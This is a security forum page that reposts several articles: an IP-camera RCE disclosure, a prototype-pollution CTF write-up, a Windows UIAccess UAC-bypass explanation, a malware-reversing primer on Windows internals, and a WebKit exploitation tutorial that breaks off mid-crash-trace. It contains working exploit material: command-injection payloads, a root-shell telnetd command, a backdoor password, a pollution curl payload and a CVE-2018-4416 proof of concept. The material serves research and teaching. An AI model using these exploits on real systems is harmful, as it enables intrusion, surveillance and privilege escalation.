https://github.com/sgayou/subaru-starlink-research/blob/master/doc/README.md#jailbreaking-subaru-starlink
    1 point
  9. Maurits van Altvorst Achieving remote code execution on a Chinese IP camera February 14, 2019 Background Cheap Chinese Internet of Things devices are on the rise. Unfortunately, security on these devices is often an afterthought. I recently got my hands on an “Alecto DVC-155IP” IP camera. It has Wi-Fi, night vision, two-axis tilt and yaw control, motion sensing and more. My expectations regarding security were low, but this camera was still able to surprise me. Setting up the camera Setting up the camera using the app was a breeze. I had to enter my Wi-Fi details, a name for the camera and a password. Nothing too interesting so far. Using Nmap on the camera gave me the following results: ➜ ~ nmap -A 192.168.178.59 Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-09 12:59 CET Nmap scan report for 192.168.178.59 Host is up (0.010s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 23/tcp open telnet BusyBox telnetd 80/tcp open http thttpd 2.25b 29dec2003 |_http-server-header: thttpd/2.25b 29dec2003 |_http-title: Site doesn't have a title (text/html; charset=utf-8). 554/tcp open rtsp HiLinux IP camera rtspd V100R003 (VodServer 1.0.0) |_rtsp-methods: OPTIONS, DESCRIBE, SETUP, TEARDOWN, PLAY Service Info: Host: RT-IPC; Device: webcam Three open ports: 23, 80 and 554. Surprisingly, port 23 doesn’t get mentioned anywhere in the manual. Is this some debug port from the manufacturer, or a backdoor from the Chinese government? After manually testing a few passwords via telnet I moved on. When I connected to the admin panel - accessible on port 80 - I was greeted with a standard login screen that prompts the user for a username and password. The first step I took was opening the Chrome developer tab. This allows you to inspect the network requests that Chrome made while visiting a website. I saw that there were a lot of requests being made for a simple login page. My eye quickly fell on a specific request: /cgi-bin/hi3510/snap.cgi?&-getstream&-chn=2 Hmm, “getstream”, I wonder what happens if I open this in another tab… Within 2 minutes I’ve gained unauthenticated access to the live view of the camera. I knew that cheap Chinese cameras weren’t secure, but I didn’t expect it was this bad. Other observations While looking through the network requests, I noticed some more notable endpoints: You are able to get the Wi-Fi SSID, BSSID, and password from the network the camera is connected to by visiting /cgi-bin/getwifiattr.cgi. This allows you to retrieve the location of the camera via a service such as wigle.net. You are able to set the camera’s internal time via /cgi-bin/hi3510/setservertime.cgi?-time=YYYY.MM.DD.HH.MM.SS&-utc. I’m not sure if this opens up any attack vectors, but it’s interesting nonetheless. It might be possible to do some interesting things by sending invalid times or big strings, but I don’t want to risk bricking my camera testing this. You are able to get the camera’s password via /cgi-bin/p2p.cgi?cmd=p2p.cgi&-action=get. Of course, you don’t even need the password to log in. Just set the “AuthLevel” cookie to 255 and you instantly get admin access. You are able to get the serial number, hardware revision, uptime, and storage info via /web/cgi-bin/hi3510/param.cgi?cmd=getserverinfo All of these requests are unauthenticated. Remote code execution Let’s take another look at the requests made on the login page. You can see a lot of “.cgi” requests. CGI-files are “Common Gateway Interface” files. They are executable scripts used in web servers to dynamically create web pages. Because they’re often based on bash scripts, I started focusing on these requests first because I thought I might find an endpoint susceptible to bash code injection. To find out if a .cgi endpoint was vulnerable, I tried substituting some request parameters with $(sleep 3). When I tried /cgi-bin/p2p.cgi?cmd=p2p.cgi&-action=$(sleep 3), it took a suspiciously long time before I got back my response. To confirm that I can execute bash code, I opened Wireshark on my laptop and sent the following payload to the camera: $(ping -c2 192.168.178.243) And sure enough, I saw two ICMP requests appear on my laptop. But surely, nobody in their right mind would connect such a cheap, insecure IP camera directly to the internet, right? That’s 710 Alecto DVC-155IP cameras connected to the internet that disclose their Wi-Fi details (which means that I can figure out its location by using a service such as wigle.net), allow anyone to view their live stream and are vulnerable to RCE. And this is just their DVC-155IP model, Alecto manufactures many different IP cameras each running the same software. Returning to port 23 Now that I’m able to run commands, it’s time to return to the mysterious port 23. Unfortunately, I’m not able to get any output from the commands I execute. Using netcat to send the output of the commands I executed also didn’t work for some reason. After spending way too much time without progress, this was the command that did the trick: telnetd -l/bin/sh -p9999 This starts a telnet server on port 9999. And sure enough, after connecting to it I was greeted with an unauthenticated root shell. Reading /etc/passwd gave me the following output: root:$1$xFoO/s3I$zRQPwLG2yX1biU31a2wxN/:0:0::/root:/bin/sh I didn’t even have to start Hashcat for this one: a quick Google search of the hash was all I needed to find that the password of the mysterious backdoor port was cat1029. Yes, the password to probably thousands of IP cameras on the internet is cat1029. And the worst part is that there’s no possible way to change this password anywhere in the typical user interface. Contacting the manufacturer When I contacted Alecto with my findings, they told me they weren’t able to solve these problems because they didn’t create the software for their devices. After a quick Shodan search I found that there were also internet connected cameras from other brands, such as Foscam and DIGITUS, that had these vulnerabilities. Their user interfaces look different, but they were susceptible to the same exact vulnerabilities via the same exact endpoints. It seems that these IP cameras are manufactured by a Chinese company in bulk (OEM). Other companies like Alecto, Foscam, and DIGITUS, resell them with slightly modified firmware and custom branding. A vulnerability in the Chinese manufacturer’s software means that all of its children companies are vulnerable too. Unfortunately, I don’t think that the Chinese OEM manufacturer will do much about these vulnerabilities. I guess that the phrase “The S in IoT stands for security” is true after all. Author | Maurits van Altvorst I'm 16 years old and a student from Gemeentelijk Gymnasium Hilversum. You can find my Github here and my Linkedin here Sursa: https://www.mauritsvanaltvorst.com/rce-chinese-ip-cameras/
    1 point
  10. Analysis and Exploitation of Prototype Pollution attacks on NodeJs - Nullcon HackIM CTF web 500 writeup Feb 15, 2019 • ctf Prototype Pollution attacks on NodeJs is a recent research by Olivier Arteau where he discovered how to exploit an application if we can pollute the prototype of a base object. Introduction Objects in javaScript Functions/Classes in javaScript? WTH is a constructor ? Prototypes in javaScript Prototype Pollution Merge() - Why was it vulnerable? References Introduction Prototype Pollution attacks, as the name suggests, is about polluting the prototype of a base object which can sometimes lead to RCE. This is a fantastic research done by Olivier Arteau and has given a talk on NorthSec 2018. Let’s take a look at the vulnerability in-depth with an example from Nullcon HackIm 2019 challenge named proton: Objects in javaScript An object in the javaScript is nothing but a collection of key value pairs where each pair is known as a property. Let’s take an example to illustrate (you can use the browser console to execute and try it yourself): var obj = { "name": "0daylabs", "website": "blog.0daylabs.com" } obj.name; // prints "0daylabs" obj.website; // prints "blog.0daylabs.com" console.log(obj); // prints the entire object along with all of its properties. In the above example, name and website are the properties of the object obj. If you carefully look at the last statement, the console.log prints out a lot more information than the properties we explicitly defined. Where are these properties coming from ? Object is the fundamental basic object upon which all other objects are created. We can create an empty object (without any properties) by passing the argument null during object creation, but by default it creates an object of a type that corresponds to its value and inherits all the properties to the newly created object (unless its null). console.log(Object.create(null)); // prints an empty object Functions/Classes in javaScript? In javaScript, the concept of classes and functions are relative (functions itself serves as the constructor for the class and there is no explicit “classes” itself). Let’s take an example: function person(fullName, age) { this.age = age; this.fullName = fullName; this.details = function() { return this.fullName + " has age: " + this.age; } } console.log(person.prototype); // prints the prototype property of the function /* {constructor: ƒ} constructor: ƒ person(fullName, age) __proto__: Object */ var person1 = new person("Anirudh", 25); var person2 = new person("Anand", 45); console.log(person1); /* person {age: 25, fullName: "Anirudh"} age: 45 fullName: "Anand" __proto__: constructor: ƒ person(fullName, age) arguments: null caller: null length: 2 name: "person" prototype: {constructor: ƒ} __proto__: ƒ () [[FunctionLocation]]: VM134:1 [[Scopes]]: Scopes[1] __proto__: Object */ console.log(person2); /* person {age: 45, fullName: "Anand"} age: 45 fullName: "Anand" __proto__: constructor: ƒ person(fullName, age) arguments: null caller: null length: 2 name: "person" prototype: {constructor: ƒ} __proto__: ƒ () [[FunctionLocation]]: VM134:1 [[Scopes]]: Scopes[1] __proto__: Object */ person1.details(); // prints "Anirudh has age: 25" In the above example, we defined a function named person and we created 2 objects named person1 and person2. If we take a look at the properties of the newly created function and objects, we can note 2 things: When a function is created, JavaScript engine includes a prototype property to the function. This prototype property is an object (called as prototype object) and has a constructor property by default which points back to the function on which prototype object is a property. When an object is created, JavaScript engine adds a __proto__ property to the newly created object which points to the prototype object of the constructor function. In short, object.__proto__ is pointing to function.prototype. WTH is a constructor ? Constructor is a magical property which returns the function that used to create the object. The prototype object has a constructor which points to the function itself and the constructor of the constructor is the global function constructor. var person3 = new person("test", 55); person3.constructor; // prints the function "person" itself person3.constructor.constructor; // prints ƒ Function() { [native code] } <- Global Function constructor person3.constructor.constructor("return 1"); /* ƒ anonymous( ) { return 1 } */ // Finally call the function person3.constructor.constructor("return 1")(); // returns 1 Prototypes in javaScript One of the things to note here is that the prototype property can be modified at run time to add/delete/edit entries. For example: function person(fullName, age) { this.age = age; this.fullName = fullName; } var person1 = new person("Anirudh", 25); person.prototype.details = function() { return this.fullName + " has age: " + this.age; } console.log(person1.details()); // prints "Anirudh has age: 25" What we did above is that we modified the function’s prototype to add a new property. The same result can be achieved using objects: function person(fullName, age) { this.age = age; this.fullName = fullName; } var person1 = new person("Anirudh", 25); var person2 = new person("Anand", 45); // Using person1 object person1.constructor.prototype.details = function() { return this.fullName + " has age: " + this.age; } console.log(person1.details()); // prints "Anirudh has age: 25" console.log(person2.details()); // prints "Anand has age: 45" :O Noticied anything suspicious? We modified person1 object but why person2 also got affected? The reason being that in the first example, we directly modified person.prototype to add a new property but in the 2nd example we did exactly the same but by using object. We have already seen that constructor returns the function using which the object is created so person1.constructor points to the function person itself and person1.constructor.prototype is the same as person.prototype. Prototype Pollution Let’s take an example, obj[a] = value. If an attacker can control a and value, then he can set the value of a to __proto__ and the property b will be defined for all existing objects of the application with the value value. The attack is not as simple as it feels like from the above statement. According to the research paper, this is exploitable only if any of the following 3 happens: Object recursive merge Property definition by path Object clone Let’s take the Nullcon HackIM challenge to see a practical scenario. The challenge starts with iterating a MongoDB id (which was trivial to do) and we get access to the below source code: 'use strict'; const express = require('express'); const bodyParser = require('body-parser') const cookieParser = require('cookie-parser'); const path = require('path'); const isObject = obj => obj && obj.constructor && obj.constructor === Object; function merge(a, b) { for (var attr in b) { if (isObject(a[attr]) && isObject(b[attr])) { merge(a[attr], b[attr]); } else { a[attr] = b[attr]; } } return a } function clone(a) { return merge({}, a); } // Constants const PORT = 8080; const HOST = '0.0.0.0'; const admin = {}; // App const app = express(); app.use(bodyParser.json()) app.use(cookieParser()); app.use('/', express.static(path.join(__dirname, 'views'))); app.post('/signup', (req, res) => { var body = JSON.parse(JSON.stringify(req.body)); var copybody = clone(body) if (copybody.name) { res.cookie('name', copybody.name).json({ "done": "cookie set" }); } else { res.json({ "error": "cookie not set" }) } }); app.get('/getFlag', (req, res) => { var аdmin = JSON.parse(JSON.stringify(req.cookies)) if (admin.аdmin == 1) { res.send("hackim19{}"); } else { res.send("You are not authorized"); } }); app.listen(PORT, HOST); console.log(`Running on http://${HOST}:${PORT}`); The code starts with defining a function merge which is essentially an insecure design of merging 2 objects. Since the latest version of libraries that does the merge() has already been patched, the challenge delibrately used the old method in which merge used to happen to make it vulnerable. One thing we can quickly notice in the above code is the definition of 2 “admins” as const admin and var аdmin. Ideally javaScript doesn’t allow to define a const variable again as var so this has to be different. It took a good amount of time to figure out that one of them has a normal a while the other has some other a (homograph). So instead of wasting time over it, I renamed it to normal a itself and worked on the challenge so that once solved, we can send the payload accordingly. So from the challenge source code, here are the following observations: Merge() function is written in a way that prototype pollution can happen (more analysis of the same later in the article). So that’s indeed the way to solve the problem. The vulnerable function is actually called while hitting /signup via clone(body) so we can send our JSON payload while signing up which can add the admin property and immediately call /getFlag to get the flag. As discussed above, we can use __proto__ (points to constructor.prototype) to create the admin property with value 1. The simplest payload to do the same: {"__proto__": {"admin": 1}} So the final payload to solve the problem (using curl since I was not able to send homograph via burp): curl -vv --header 'Content-type: application/json' -d '{"__proto__": {"admin": 1}}' 'http://0.0.0.0:4000/signup'; curl -vv 'http://0.0.0.0:4000/getFlag' Merge() - Why was it vulnerable? One obvious question here is, what makes the merge() function vulnerable here? Here is how it works and what makes it vulnerable: The function starts with iterating all properties that is present on the 2nd object b (since 2nd is given preference incase of same key-value pairs). If the property exists on both first and second arguments and they are both of type Object, then it recusively starts to merge it. Now if we can control the value of b[attr] to make attr as __proto__ and also if we can control the value inside the proto property in b, then while recursion, a[attr] at some point will actually point to prototype of the object a and we can successfully add a new property to all the objects. Still confused ? Well I don’t blame, because it took sometime for me also to understand the concept. Let’s write some debug statements to figure out what is happening. const isObject = obj => obj && obj.constructor && obj.constructor === Object; function merge(a, b) { console.log(b); // prints { __proto__: { admin: 1 } } for (var attr in b) { console.log("Current attribute: " + attr); // prints Current attribute: __proto__ if (isObject(a[attr]) && isObject(b[attr])) { merge(a[attr], b[attr]); } else { a[attr] = b[attr]; } } return a } function clone(a) { return merge({}, a); } Now let’s try sending the curl request mentioned above. What we can notice is that the object b now has the value: { __proto__: { admin: 1 } } where __proto__ is just a property name and is not actually pointing to function prototype. Now during the function merge(), for (var attr in b) iterates through every attribute where the first attribute name now is __proto__. Since it’s always of type object, it starts to recursively call, this time as merge(a[__proto__], b[__proto__]). This essentially helped us in getting access to function prototype of a and add new properties which is defined in the proto property of b. References Olivier Arteau – Prototype pollution attacks in NodeJS applications Prototypes in javaScript MDN Web Docs - Object Anirudh Anand Security Engineer @flipkart | Web Application Security ♥ | Google, Microsoft, Zendesk, Gitlab Hall of Fames | Blogger | CTF lover - @teambi0s | certs - eWDP, OSCP Sursa: https://blog.0daylabs.com/2019/02/15/prototype-pollution-javascript/
    1 point
  11. Trends, Challenges, and Strategic Shifts in the Software Vulnerability Mitigation Landscape The software vulnerability landscape has changed dramatically over the past 20+ years. During this period, we’ve gone from easy-to-exploit stack buffer overruns to complex-and-expensive chains of multiple exploits. To better understand this evolution, this presentation will describe the vulnerability mitigation strategy Microsoft has been pursuing and will show how this strategy has influenced vulnerability and exploitation trends over time. This retrospective will form the basis for discussing some of the vulnerability mitigation challenges that exist today and the strategic shifts that Microsoft is exploring to address those challenges.
    1 point
  12. Thursday, 14 February 2019 Accessing Access Tokens for UIAccess I mentioned in a previous blog post (link) Windows RS5 finally kills the abuse of Access Tokens, as far as I can tell, to elevate to admin by just opening the access token. This is a shame, but personally I didn't care. However, I was contacted on Twitter about some UAC related things, specifically getting UIAccess. I was surprised that people have not been curious enough to put two and two together and realize that the previous token stealing bug can still be used to get you UIAccess even if the direct path to admin has been blocked. This blog post gives a bit of information on why you might care about UIAccess and how you can get your own code running as UIAccess. TL;DR; you can do the same token stealing trick with UIAccess processes, which doesn't require an elevation prompt, then automate the UI of a privileged process to get a UAC bypass. An example PowerShell script which does this is on my github. First, what is UIAccess? One of the related features of UAC was User Interface Privilege Isolation (UIPI). UIPI limits the ability of a process interacting with the windows of a higher integrity level process, preventing a malicious application automating a privileged UI to elevate privileges. There's of course some holes which have been discovered over the years but the fundamental principle is sound. However there's a big problem, what about Assistive Technologies? Many people rely on on-screen keyboards, screen readers and the like, they won't work if you can't read and automate the privileged UI. If you're blind does that mean you can't be an administrator? The design Microsoft went with was for a backdoor to UIPI and added a special flag to Access Tokens called UIAccess. When this flag is set most of the UIPI features of WIN32K are relaxed. From an escalation perspective if you have UIAccess you can automate the windows of a higher integrity process, say an administrator command prompt and use that access to bypass, further, UAC prompts. You can set the UIAccess flag on a token by calling SetTokenInformation and pass the TokenUIAccess information class. If you do that you'll find that you can't set the flag as a normal user, you need SeTcbPrivilege which is typically only granted to SYSTEM. If you need a "God" privilege to set the flag how does UIAccess get set in normal operation? You need to get the AppInfo service to spawn your process with an appropriate set of flags or just call ShellExecute. As the service runs as SYSTEM with SeTcbPrivilege is can set the UIAccess flag on start up. While the Consent application will spawn for UIAccess no UAC prompt will show (otherwise what's the point?). The AppInfo service spawns admin UAC processes, however by setting the uiAccess attribute in your manifest to true it'll instead spawn your process as UIAccess. However, it's not that simple, as per this link you also need sign the executable (easy as it can be self-signed) but also the executable must be in a secure location such as System32 or Program Files (harder). To prevent a malicious application spawning a UIAccess process, then injecting code into it, the AppInfo service tweaks the integrity of the token to be High (for split-token admin) or the current integrity plus 16 for normal users. This elevated integrity blocks read/write access to the new process. Of course there are bugs, for example I found one in 2014, since fixed, in the secure location check by abusing directory NTFS named streams. UACME also has an exploit which abuses UIAccess (method 32, based on this blog post) if you can find a writable secure location directory or abuse the existing IFileOperation tricks to write a file into the appropriate location. However, for those keeping score the UIAccess is a property of the access token. As the OS doesn't do anything special to clear it you can open the token from an existing UIAccess process, take it's token and create a new process with that token and start automating the heck out of privileged windows 😉 In summary here's how to exploit this behavior on a completely default install of Windows 10 RS5 and below. Find or start a UIAccess process, such as the on-screen keyboard (OSK.EXE). As AppInfo doesn't prompt for UIAccess this can be done, relatively, silently. Open the process for PROCESS_QUERY_LIMITED_INFORMATION access. This is allowed as long as you have any access to the process. This could even be done from a Low integrity process (but not from an AC) although on Windows 10 RS5 some other sandbox mitigations get in the way in the next step, but it should work on Windows 7. Open the process token for TOKEN_DUPLICATE access and duplicate the token to a new writable primary token. Set the new token's integrity to match your current token's integrity. Use the token in CreateProcessAsUser to spawn a new process with the UIAccess flag. Automate the UI to your heart's desire. Based on my original blogs you might wonder how I can create a new process with the token when previously I could only impersonate? For UIAccess the AppInfo service just modifies a copy of the caller's token rather than using the linked token. This means the UIAccess token is considered a sibling of any other process on the desktop and so is permitted to assign the primary token as long as the integrity is dropped to be equal or lower than the current integrity. As an example I've uploaded a PowerShell script which does the attack and uses the SendKeys class to write an arbitrary command to a focused elevated command prompt on the desktop (how you get the command prompt is out of scope). There's almost certainly other tricks you can do once you've got UIAccess. For example if the administrator has set the "User Account Control: Allow UIAccess applications to prompt for elevation without using the secure desktop" group policy then it's possible to disable the secure desktop from a UIAccess process and automate the elevation prompt itself. In conclusion, while the old admin token stealing trick went away it doesn't mean it doesn't still have value. By abusing UIAccess programs we can almost certainly bypass UAC. Of course as it's not a security boundary and is so full of holes I'm not sure anyone cares about it Posted by tiraniddo at 15:42 Sursa: https://tyranidslair.blogspot.com/2019/02/accessing-access-tokens-for-uiaccess.html
    1 point
  13. Reverse Engineering Malware, Part 4: Windows Internals July 4, 2017 Welcome back to my Reverse Engineering Malware series. In general, reverse engineering of malware is done on Windows systems. That's because despite recent inroads by Linux and the Mac OS, Windows systems still comprise over 90% of all computing systems in the world. As such, well over 90% of malware is designed to compromise Windows system. For this reason, it makes sense to focus our attention to Windows operating systems. When reversing malware, the operating system plays a key role. All applications interact with the operating system and are tightly integrated with the OS. We can gather a significant amount of information on the malware by probing the interface between the OS and the application (malware). To understand how malware can use and manipulate Windows then, we need to better understand the inner workings of the Windows operating system. In this article, we will examine the inner workings or Windows 32-bit systems so that we can better understand how malware can use the operating system for its malicious purposes. Windows internals could fill several textbooks (and has), so I will attempt to just cover the most important topics and only in a cursory way. I hope to leave you with enough information though, that you can effectively reverse the malware in the following articles. Virtual Memory Virtual memory is the idea that instead of software directly accessing the physical memory, the CPU and the operating system create an invisible layer between the software and the physical memory. The OS creates a table that the CPU consults called the page table that directs the process to the location of the physical memory that it should use. Processors divide memory into pages Pages are fixed sized chunks of memory. Each entry in the page table references one page of memory. In general, 32 -bit processors use 4k sized pages with some exceptions. Kernel v User Mode Having a page table enables the processor to enforce rules on how memory will be accessed. For instance, page table entries often have flags that determine whether the page can be accessed from a non-privileged mode (user mode). In this way, the operating system's code can reside inside the process's address space without concern that it will be accessed by non-privileged processes. This protects the operating system's sensitive data. This distinction between privileged vs. non-privileged mode becomes kernel (privileged) and non-privileged (user) modes. Kernel memory Space The kernel reserves 2gb of address space for itself. This address space contains all the kernel code, including the kernel itself and any other kernel components such as device drivers Paging Paging is the process where memory regions are temporarily flushed to the hard drive when they have not been used recently. The processor tracks the time since a page of memory was last used and the oldest is flushed. Obviously, physical memory is faster and more expensive than space on the hard drive. The windows operating system tracks when a page was last accessed and then uses that information to locate pages that haven't been accessed in a while. Windows then flushes their content to a file. The contents of the flushed pages can then be discarded and the space used by other information. When the operating system needs to access these flushed pages, a page fault will be generated and then system then does that the information has "paged out" to a file. Then, the operating system will access the page file and pull the information back into memory to be used. Objects and Handles The Windows kernel manages objects using a centralized object manager component. This object manager is responsible for all kernel objects such as sections, files, and device objects, synchronization objects, processes and threads. It ONLY manages kernel objects. GUI-related objects are managed by separate object managers that are implemented inside WIN32K.SYS Kernel code typically accesses objects using direct pointers to the object data structures. Applications use handles for accessing individual objects Handles A handle is process specific numeric identifier which is an index into the processes private handle table. Each entry in the handle table contains a pointer to the underlying object, which is how the system associates handles with objects. Each handle entry also contains an access mask that determines which types of operations that can be performed on the object using this specific handle. Processes A process is really just an isolated memory address space that is used to run a program. Address spaces are created for every program to make sure that each program runs in its own address space without colliding with other processes. Inside a processes' address space the system can load code modules, but must have at latest one thread running to do so. Process Initialization The creation of the process object and the new address space is the first step. When a new process calls the Win32 API CreateProcess, the API creates a process object and allocates a new memory address space for the process. CreateProcess maps NTDLL.DLL and the program executable (the .exe file) into the newly created address space. CreateProcess creates the process's first thread and allocates stack space it. The processes first thread is resumed and starts running in the LdrpInitialization function inside NTDLL.DLL LdrpInitialization recursively traverses the primary executable's import tables and maps them to memory every executable that is required. At this point, control passes into LdrpRunInitializeRoutines, which is an internal NTDLL routine responsible for initializing all statically linked DLL's currently loaded into the address space. The initialization process consists of a link each DLL's entry point with the DLL_PROCESS_ATTACH constant. Once all the DLL's are initialized, LdrpInitialize calls the thread's real initialization routine, which is the BaseProcessStart function from KERNELL32.DLL. This function in turn calls the executable's WinMain entry point, at which point the process has completed it's initialization sequence. Threads At ant given moment, each processor in the system is running one thread. Instead of continuing to run a single piece of code until it completes, Windows can decide to interrupt a running thread at given given time and switch to execution of another thread. A thread is a data structure that has a CONTEXT data structure. This CONTEXT includes; (1) the state of the processor when the thread last ran (2) one or two memory blocks that are used for stack space (3) stack space is used to save off current state of thread when context switched (4) components that manage threads in windows are the scheduler and the dispatcher (5) Deciding which thread get s to run for how long and perform context switch Context Switch Context switch is the thread interruption. In some cases, threads just give up the CPU on their own and the kernel doesn't have to interrupt. Every thread is assigned a quantum, which quantifies has long the the thread can run without interruption. Once the quantum expires, the thread is interrupted and other threads are allowed to run. This entire process is transparent to thread. The kernel then stores the state of the CPU registers before suspending and then restores that register state when the thread is resumed. Win32 API An API is a set of functions that the operating system makes available to application programs for communicating with the OS. The Win32 API is a large set of functions that make up the official low-level programming interface for Windows applications. The MFC is a common interface to the Win32 API. The three main components of the Win 32 API are; (1) Kernel or Base API's: These are the non GUI related services such as I/O, memory, object and process an d thread management (2) GDI API's : these include low-level graphics services such a s those for drawing a line, displaying bitmap, etc. (3) USER API's : these are the higher level GUI-related services such as window management, menus, dialog boxes, user-interface controls. System Calls A system call is when a user mode code needs to cal a kernel mode function. This usually happens when an application calls an operating system API. User mode code invokes a special CPU instruction that tells the processor to switch to its privileged mode and call a dispatch routine. This dispatch routine then calls the specific system function requested from user mode. PE Format The Windows executable format is a PE (portable Executable). The term "portable" refers to format's versatility in numerous environments and architectures. Executable files are relocatable. This means that they could be loaded at a different virtual address each time they are loaded. An executable must coexist with other executables that are loaded in the same memory address. Other than the main executable, every program has a certain number of additional executables loaded into its address space regardless of whether it has DLL's of its own or not. Relocation Issues If two excutables attempt to be loaded into the same virtual space, one must be relocated to another virtual space. each executable is module is assigned a base address and if something is already there, it must be relocated. There are never absolute memory addresses in executable headers, those only exist in the code. To make this work, whenever there is a pointer inside the executable header, it is always a relative virtual address (RVA). Think of this as simply an offset. When the file is loaded, it is assigned a virtual address and the loaded calculates real virtual addresses out of RVA's by adding the modules base address to an RVA. Image Sections An executable section is divided into individual sections in which the file's contents are stored. Sections are needed because different areas in the file are treated differently by the memory manager when a module is loaded. This division takes place in the code section (also called text) containing the executable's code and a data section containing the executable's data. When loaded, the memory manager sets the access rights on memory pages in the different sections based on their settings in the section header. Section Alignment Individual sections often have different access settings defined in the executable header. The memory manager must apply these access settings when an executable image is loaded. Sections must typically be page aligned when an executable is loaded into memory. It would take extra space on disk to page align sections on disk. Therefore, the PE header has two different kinds of alignment fields, section alignment and file alignment. DLL's DLL's allow a program to be broken into more than one executable file. In this way, overall memory consumption is reduced, executables are not loaded until features they implement are required. Individual components can be replaced or upgraded to modify or improve a certain aspect of the program. DLL's can dramatically reduce overall system memory consumption because the system can detect that a certain executable has been loaded into more than one address space, then map it into each address space instead of reloading it into a new memory location. DLL's are different from static libraries (.lib) which linked to the executable. Loading DLL's Static Linking is implemented by having each module list the the modules it uses and the functions it calls within each module. This is known as an import table (see IDA Pro tutorial). Run time linking refers to a different process whereby an executable can decide to load another executable in runtime and call a function from that executable. PE Headers A Portable Executable (PE) file starts with a DOS header. "This program cannot be run in DOS mode" typedef struct _IMAGE_NT_HEADERS { DWORD Signature; IMAFE_FILE_HEADER Fileheader; IMAGE_OPTIONAL_HEADER32 OptionHeader; } Image_NT_HEADERS32, *PIMAGE_NT_HEADERS32 This data structure references two data structures which contain the actual PE header. Imports and Exports Imports and Exports are the mechanisms that enable the dynamic linking process of executables. The compiler has no idea of the actual addresses of the imported functions, only in runtime will these addresses be known. To solve this issue, the linker creates a import table that lists all the functions imported by the current module by their names. Susa: https://www.hackers-arise.com/single-post/2017/07/04/Reverse-Engineering-Malware-Part-4-Windows-Internals
    1 point
  14. Webkit Exploitation Tutorial 41 minute read Contents Preface Setup Virtual Machine Source Code Debugger and Editor Test Compiling JavaScriptCore Triggering Bugs Understanding WebKit Vulnerability 1. Use After Free 2. Out of Bound 3. Type Confusion 4. Integer Overflow 5. Else JavaScriptCore in Depth JSC Value Representation JSC Object Model 0x0 Fast JSObject 0x1 JSObject with dynamically added fields 0x2 JSArray with room for 3 array elements 0x3 Object with fast properties and array elements 0x4 Object with fast and dynamic properties and array elements 0x5 Exotic object with dynamic properties and array elements Type Inference Watchpoints Compilers 0x0. LLInt 0x1. Baseline JIT and Byte Code Template 0x2. DFG 0x3. FLT 0x4. More About Optimization Garbage Collector (TODO) Writing Exploitation Analyzing Utility Functions Getting Native Code Controlling Bytes Writing Exploit Detail about the Script Conclusion on the Exploitation Debugging WebKit Setting Breakpoints Inspecting JSC Objects Getting Native Code 1 Day Exploitation Root Cause Quotation from Lokihardt Line by Line Explanation Debugging Constructing Attack Primitive addrof fakeobj Arbitrary R/W and Shellcode Execution Acknowledgement References Preface OKay, binary security is not only heap and stack, we still have a lot to discover despite regular CTF challenge. Browser, Virtual Machine, and Kernel all play an important role in binary security. And I decide to study browser first. I choose a relatively easy one: WebKit. (ChakraCore might be easier, LoL. But there’s a rumor about Microsoft canceling the project. Thus I decided not to choose it). I will write a series of posts to record my notes in studying WebKit security. It’s also my first time learning Browser Security, my posts probably will have lots of mistakes. If you notice them, don’t be hesitate to contact me for corrections. Before reading it, you need to know: C++ grammar Assembly Language grammar Installation of Virtual Machine Familiar to Ubuntu and its command line Basic compile theory concepts Setup Okay, let’s start now. Virtual Machine First, we need to install a VM as our testing target. Here, I choose Ubuntu 18.04 LTS and Ubuntu 16.04 LTSas our target host. You can download here. If I don’t specify the version, please use 18.04 LTS as default version. Mac might be a more appropriate choice since it has XCode and Safari. Consider to MacOS’s high resource consumption and unstable update, I would rather use Ubuntu. We need a VM software. I prefer to use VMWare. Parallel Desktop and VirtualBox(Free) are also fine, it depends on your personal habit. I won’t tell you how to install Ubuntu on VMWare step by step. However, I still need to remind you to allocate as much memory and CPUs as possible because compilation consumes a huge amount of resource. An 80GB disk should be enough to store source code and compiled files. Source Code You can download WebKit source code in three ways: git, svn, and archive. The default version manager of WebKit is svn. But I choose git(too unfamiliar to use svn): git clone git://git.webkit.org/WebKit.git WebKit Debugger and Editor IDE consumes lots of resource, so I use vim to edit source code. Most debug works I have seen use lldb which I am not familiar to. Therefore, I also install gdb with gef plugin. sudo apt install vim gdb lldb wget -q -O- https://github.com/hugsy/gef/raw/master/scripts/gef.sh | sh Test Compiling JavaScriptCore Compiling a full WebKit takes a large amount of time. We only compile JSC(JavaScript Core) currently, where most vulnerabilities come from. Now, you should in the root directory of WebKit source code. Run this to prepare dependencies: Tools/gtk/install-dependencies Even though we still not compile full WebKit now, you can install remaining dependencies first for future testing. This step is not required in compiling JSC if you don’t want to spend too much time: Tools/Scripts/update-webkitgtk-libs After that, we can compile JSC: Tools/Scripts/build-webkit --jsc-only A couple of minutes later, we can run JSC by: WebKitBuild/Release/bin/jsc Let’s do some tests: >>> 1+1 2 >>> var obj = {a:1, b:"test"} undefined >>> JSON.stringify(obj) {"a":1,"b":"test"} Triggering Bugs Ubuntu 18.04 LTS here We use CVE-2018-4416 to test, here is the PoC. Store it to poc.js at the same folder of jsc: function gc() { for (let i = 0; i < 10; i++) { let ab = new ArrayBuffer(1024 * 1024 * 10); } } function opt(obj) { // Starting the optimization. for (let i = 0; i < 500; i++) { } let tmp = {a: 1}; gc(); tmp.__proto__ = {}; for (let k in tmp) { // The structure ID of "tmp" is stored in a JSPropertyNameEnumerator. tmp.__proto__ = {}; gc(); obj.__proto__ = {}; // The structure ID of "obj" equals to tmp's. return obj[k]; // Type confusion. } } opt({}); let fake_object_memory = new Uint32Array(100); fake_object_memory[0] = 0x1234; let fake_object = opt(fake_object_memory); print(fake_object); First, switch to the vulnerable version: git checkout -b CVE-2018-4416 034abace7ab It may spend even more time than compiling Run: ./jsc poc.js, and we can get: ASSERTION FAILED: structureID < m_capacity ../../Source/JavaScriptCore/runtime/StructureIDTable.h(129) : JSC::Structure* JSC::StructureIDTable::get(JSC::StructureID) 1 0x7f055ef18c3c WTFReportBacktrace 2 0x7f055ef18eb4 WTFCrash 3 0x7f055ef18ec4 WTFIsDebuggerAttached 4 0x5624a900451c JSC::StructureIDTable::get(unsigned int) 5 0x7f055e86f146 bool JSC::JSObject::getPropertySlot<true>(JSC::ExecState*, JSC::PropertyName, JSC::PropertySlot&) 6 0x7f055e85cf64 7 0x7f055e846693 JSC::JSObject::toPrimitive(JSC::ExecState*, JSC::PreferredPrimitiveType) const 8 0x7f055e7476bb JSC::JSCell::toPrimitive(JSC::ExecState*, JSC::PreferredPrimitiveType) const 9 0x7f055e745ac8 JSC::JSValue::toStringSlowCase(JSC::ExecState*, bool) const 10 